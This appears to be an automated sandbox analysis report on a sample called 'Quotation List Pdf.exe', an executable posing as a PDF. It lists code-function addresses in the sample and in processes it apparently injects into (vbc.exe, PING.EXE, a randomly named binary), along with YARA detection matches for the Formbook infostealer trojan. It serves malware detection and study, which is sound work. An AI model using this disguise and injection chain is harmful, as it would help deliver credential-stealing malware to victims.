Source: C:\Users\user\Desktop\Quotation List Pdf.exe Code function: 0_2_00007FF768464B10 0_2_00007FF768464B10
Source: C:\Users\user\Desktop\Quotation List Pdf.exe Code function: 0_2_00007FF7684502A0 0_2_00007FF7684502A0
Source: C:\Users\user\Desktop\Quotation List Pdf.exe Code function: 0_2_00007FF7684382D0 0_2_00007FF7684382D0
Source: C:\Users\user\Desktop\Quotation List Pdf.exe Code function: 0_2_00007FF768465490 0_2_00007FF768465490
Source: C:\Users\user\Desktop\Quotation List Pdf.exe Code function: 0_2_00007FF768456C90 0_2_00007FF768456C90
Source: C:\Users\user\Desktop\Quotation List Pdf.exe Code function: 0_2_00007FF76845BC80 0_2_00007FF76845BC80
Source: C:\Users\user\Desktop\Quotation List Pdf.exe Code function: 0_2_00007FF768451D60 0_2_00007FF768451D60
Source: C:\Users\user\Desktop\Quotation List Pdf.exe Code function: 0_2_00007FF76844D620 0_2_00007FF76844D620
Source: C:\Users\user\Desktop\Quotation List Pdf.exe Code function: 0_2_00007FF768443EF0 0_2_00007FF768443EF0
Source: C:\Users\user\Desktop\Quotation List Pdf.exe Code function: 0_2_00007FF76843B6F0 0_2_00007FF76843B6F0
Source: C:\Users\user\Desktop\Quotation List Pdf.exe Code function: 0_2_00007FF768436ED0 0_2_00007FF768436ED0
Source: C:\Users\user\Desktop\Quotation List Pdf.exe Code function: 0_2_00007FF76843BF90 0_2_00007FF76843BF90
Source: C:\Users\user\Desktop\Quotation List Pdf.exe Code function: 0_2_00007FF7684E7F40 0_2_00007FF7684E7F40
Source: C:\Users\user\Desktop\Quotation List Pdf.exe Code function: 0_2_00007FF7684667E0 0_2_00007FF7684667E0
Source: C:\Users\user\Desktop\Quotation List Pdf.exe Code function: 0_2_00007FF7684517B4 0_2_00007FF7684517B4
Source: C:\Users\user\Desktop\Quotation List Pdf.exe Code function: 0_2_00007FF76845C7D0 0_2_00007FF76845C7D0
Source: C:\Users\user\Desktop\Quotation List Pdf.exe Code function: 0_2_00007FF768442080 0_2_00007FF768442080
Source: C:\Users\user\Desktop\Quotation List Pdf.exe Code function: 0_2_00007FF76846E8E0 0_2_00007FF76846E8E0
Source: C:\Users\user\Desktop\Quotation List Pdf.exe Code function: 0_2_00007FF76845C0A0 0_2_00007FF76845C0A0
Source: C:\Users\user\Desktop\Quotation List Pdf.exe Code function: 0_2_00007FF7684658C0 0_2_00007FF7684658C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0040E063 5_2_0040E063
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_00403090 5_2_00403090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0040226E 5_2_0040226E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_00402270 5_2_00402270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_00402B4B 5_2_00402B4B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_00402B50 5_2_00402B50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_004024CD 5_2_004024CD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_004024D0 5_2_004024D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0040FDC3 5_2_0040FDC3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0040FDBA 5_2_0040FDBA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_00416753 5_2_00416753
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0042D773 5_2_0042D773
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_00402710 5_2_00402710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0040FFE3 5_2_0040FFE3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058E0591 5_2_058E0591
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058BD5B0 5_2_058BD5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05820535 5_2_05820535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058D7571 5_2_058D7571
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058CE4F6 5_2_058CE4F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058DF43F 5_2_058DF43F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058D2446 5_2_058D2446
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05811460 5_2_05811460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058DF7B0 5_2_058DF7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0581C7C0 5_2_0581C7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05844750 5_2_05844750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05820770 5_2_05820770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058D16CC 5_2_058D16CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0583C6E0 5_2_0583C6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058E01AA 5_2_058E01AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0582B1B0 5_2_0582B1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058D81CC 5_2_058D81CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05810100 5_2_05810100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058BA118 5_2_058BA118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058EB16B 5_2_058EB16B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0585516C 5_2_0585516C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0580F172 5_2_0580F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058CF0CC 5_2_058CF0CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058270C0 5_2_058270C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058D70E9 5_2_058D70E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058DF0E0 5_2_058DF0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0586739A 5_2_0586739A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058E03E6 5_2_058E03E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0582E3F0 5_2_0582E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058D132D 5_2_058D132D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0580D34C 5_2_0580D34C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058DA352 5_2_058DA352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058252A0 5_2_058252A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0583B2C0 5_2_0583B2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058C12ED 5_2_058C12ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058C0274 5_2_058C0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05838DBF 5_2_05838DBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0583FDC0 5_2_0583FDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0581ADE0 5_2_0581ADE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0582AD00 5_2_0582AD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05823D40 5_2_05823D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058D1D5A 5_2_058D1D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058D7D73 5_2_058D7D73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058C0CB5 5_2_058C0CB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05810CF2 5_2_05810CF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058DFCF2 5_2_058DFCF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05820C00 5_2_05820C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05899C32 5_2_05899C32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05821F92 5_2_05821F92
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058DFFB1 5_2_058DFFB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05812FC8 5_2_05812FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0582CFE0 5_2_0582CFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058DFF09 5_2_058DFF09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05862F28 5_2_05862F28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05840F30 5_2_05840F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05894F40 5_2_05894F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05832E90 5_2_05832E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058DCE93 5_2_058DCE93
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05829EB0 5_2_05829EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058DEEDB 5_2_058DEEDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058DEE26 5_2_058DEE26
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05820E59 5_2_05820E59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058229A0 5_2_058229A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058EA9A6 5_2_058EA9A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05829950 5_2_05829950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0583B950 5_2_0583B950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05836962 5_2_05836962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058068B8 5_2_058068B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058238E0 5_2_058238E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0584E8F0 5_2_0584E8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05822840 5_2_05822840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0582A840 5_2_0582A840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0583FB80 5_2_0583FB80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058D6BD7 5_2_058D6BD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0585DBF9 5_2_0585DBF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058DAB40 5_2_058DAB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058DFB76 5_2_058DFB76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0581EA80 5_2_0581EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05865AA0 5_2_05865AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058BDAAC 5_2_058BDAAC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058CDAC6 5_2_058CDAC6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058DFA49 5_2_058DFA49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058D7A46 5_2_058D7A46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05893A6C 5_2_05893A6C
Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe Code function: 6_2_043D0FD3 6_2_043D0FD3
Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe Code function: 6_2_043D0FCA 6_2_043D0FCA
Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe Code function: 6_2_043D7963 6_2_043D7963
Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe Code function: 6_2_043EE983 6_2_043EE983
Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe Code function: 6_2_043D11F3 6_2_043D11F3
Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe Code function: 6_2_043CF273 6_2_043CF273
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_0389739A 7_2_0389739A
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_0385E3F0 7_2_0385E3F0
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_039103E6 7_2_039103E6
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_0390132D 7_2_0390132D
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_0390A352 7_2_0390A352
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_0383D34C 7_2_0383D34C
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_038552A0 7_2_038552A0
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_0386B2C0 7_2_0386B2C0
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_038F12ED 7_2_038F12ED
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_038F0274 7_2_038F0274
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_0385B1B0 7_2_0385B1B0
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_039101AA 7_2_039101AA
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_039081CC 7_2_039081CC
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_03840100 7_2_03840100
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_038EA118 7_2_038EA118
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_0388516C 7_2_0388516C
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_0383F172 7_2_0383F172
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_0391B16B 7_2_0391B16B
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_038FF0CC 7_2_038FF0CC
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_038570C0 7_2_038570C0
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_0390F0E0 7_2_0390F0E0
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_039070E9 7_2_039070E9
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_0390F7B0 7_2_0390F7B0
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_0384C7C0 7_2_0384C7C0
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_03874750 7_2_03874750
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_03850770 7_2_03850770
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_039016CC 7_2_039016CC
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_0386C6E0 7_2_0386C6E0
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_03910591 7_2_03910591
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_038ED5B0 7_2_038ED5B0
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_03850535 7_2_03850535
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_03907571 7_2_03907571
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_038FE4F6 7_2_038FE4F6
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_0390F43F 7_2_0390F43F
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_03902446 7_2_03902446
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_03841460 7_2_03841460
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_03819B80 7_2_03819B80
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_0386FB80 7_2_0386FB80
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_03906BD7 7_2_03906BD7
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_0388DBF9 7_2_0388DBF9
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_0390AB40 7_2_0390AB40
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_0390FB76 7_2_0390FB76
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_0384EA80 7_2_0384EA80
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_038EDAAC 7_2_038EDAAC
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_03895AA0 7_2_03895AA0
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_038FDAC6 7_2_038FDAC6
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_03907A46 7_2_03907A46
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_0390FA49 7_2_0390FA49
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_038C3A6C 7_2_038C3A6C
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_038529A0 7_2_038529A0
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_0391A9A6 7_2_0391A9A6
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_03859950 7_2_03859950
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_0386B950 7_2_0386B950
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_03866962 7_2_03866962
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_038368B8 7_2_038368B8
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_038538E0 7_2_038538E0
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_0387E8F0 7_2_0387E8F0
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_03852840 7_2_03852840
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_0385A840 7_2_0385A840
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_03851F92 7_2_03851F92
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_0390FFB1 7_2_0390FFB1
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_03842FC8 7_2_03842FC8
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_03813FD2 7_2_03813FD2
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_03813FD5 7_2_03813FD5
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_0385CFE0 7_2_0385CFE0
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_0390FF09 7_2_0390FF09
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_03892F28 7_2_03892F28
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_03870F30 7_2_03870F30
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_038C4F40 7_2_038C4F40
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_0390CE93 7_2_0390CE93
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_03862E90 7_2_03862E90
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_03859EB0 7_2_03859EB0
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_0390EEDB 7_2_0390EEDB
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_0390EE26 7_2_0390EE26
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_03850E59 7_2_03850E59
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_03868DBF 7_2_03868DBF
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_0386FDC0 7_2_0386FDC0
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_0384ADE0 7_2_0384ADE0
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_0385AD00 7_2_0385AD00
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_03853D40 7_2_03853D40
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_03901D5A 7_2_03901D5A
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_03907D73 7_2_03907D73
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_038F0CB5 7_2_038F0CB5
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_0390FCF2 7_2_0390FCF2
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_03840CF2 7_2_03840CF2
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_03850C00 7_2_03850C00
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_038C9C32 7_2_038C9C32
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_030918D0 7_2_030918D0
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_03093430 7_2_03093430
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_030AA450 7_2_030AA450
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_0308CA97 7_2_0308CA97
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_0308CAA0 7_2_0308CAA0
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_0308AD40 7_2_0308AD40
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_0308CCC0 7_2_0308CCC0
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_0366BBC3 7_2_0366BBC3
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_0366BAA5 7_2_0366BAA5
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_0366BF5C 7_2_0366BF5C
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_0366AFC8 7_2_0366AFC8
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_0366BD2B 7_2_0366BD2B
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\Quotation List Pdf.exe Code function: String function: 00007FF76843DBD0 appears 64 times
Source: C:\Windows\SysWOW64\PING.EXE Code function: String function: 0383B970 appears 266 times
Source: C:\Windows\SysWOW64\PING.EXE Code function: String function: 038CF290 appears 105 times
Source: C:\Windows\SysWOW64\PING.EXE Code function: String function: 03885130 appears 36 times
Source: C:\Windows\SysWOW64\PING.EXE Code function: String function: 03897E54 appears 88 times
Source: C:\Windows\SysWOW64\PING.EXE Code function: String function: 038BEA12 appears 84 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: String function: 0588EA12 appears 84 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: String function: 0580B970 appears 266 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: String function: 0589F290 appears 105 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: String function: 05855130 appears 36 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: String function: 05867E54 appears 88 times
Sample file is different than original file name gathered from version info
Source: Quotation List Pdf.exe Binary or memory string: OriginalFilename vs Quotation List Pdf.exe
Source: Quotation List Pdf.exe, 00000000.00000002.1463585868.00007FF768680000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameActivityIdthrowOnEndOfStream.dllZ vs Quotation List Pdf.exe
Source: Quotation List Pdf.exe Binary or memory string: OriginalFilenameActivityIdthrowOnEndOfStream.dllZ vs Quotation List Pdf.exe
Yara signature match
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.1557293648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.3299718726.0000000003450000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
